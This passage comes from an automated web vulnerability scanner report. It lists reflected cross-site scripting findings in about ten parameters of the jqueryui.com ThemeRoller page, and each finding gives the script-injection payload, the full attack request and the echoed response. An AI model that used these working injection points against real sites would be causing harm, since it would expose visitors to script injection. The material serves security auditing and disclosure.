mgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pnga540e"><script>alert(1)</script>2fec129ecd0&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

3.83. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7403f"><script>alert(1)</script>521994f8e38 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png7403f"><script>alert(1)</script>521994f8e38&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png7403f"><script>alert(1)</script>521994f8e38&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.84. http://jqueryui.com/themeroller/ [borderColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 759fc"><script>alert(1)</script>8a9102a62ac was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa759fc"><script>alert(1)</script>8a9102a62ac&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa759fc"><script>alert(1)</script>8a9102a62ac&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

3.85. http://jqueryui.com/themeroller/ [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 989c9"><script>alert(1)</script>521a1604b00 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa989c9"><script>alert(1)</script>521a1604b00&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa989c9"><script>alert(1)</script>521a1604b00&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

3.86. http://jqueryui.com/themeroller/ [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa52a"><script>alert(1)</script>8067e0305a5 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3aa52a"><script>alert(1)</script>8067e0305a5&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3aa52a"><script>alert(1)</script>8067e0305a5&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextur
...[SNIP]...

3.87. http://jqueryui.com/themeroller/ [borderColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45300"><script>alert(1)</script>52b8cc61183 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a45300"><script>alert(1)</script>52b8cc61183&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a45300"><script>alert(1)</script>52b8cc61183&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

3.88. http://jqueryui.com/themeroller/ [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a47"><script>alert(1)</script>60d08e980b0 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaad0a47"><script>alert(1)</script>60d08e980b0&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaad0a47"><script>alert(1)</script>60d08e980b0&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

3.89. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f63f"><script>alert(1)</script>163cc6d3cf8 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa19f63f"><script>alert(1)</script>163cc6d3cf8&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa19f63f"><script>alert(1)</script>163cc6d3cf8&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

3.90. http://jqueryui.com/themeroller/ [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72395"><script>alert(1)</script>c2b2e0d945c was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999972395"><script>alert(1)</script>c2b2e0d945c&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999972395"><script>alert(1)</script>c2b2e0d945c&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgT
...[SNIP]...

3.91. http://jqueryui.com/themeroller/ [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b6c8"><script>alert(1)</script>794ffc806f6 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px6b6c8"><script>alert(1)</script>794ffc806f6&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px6b6c8"><script>alert(1)</script>794ffc806f6&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

3.92. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

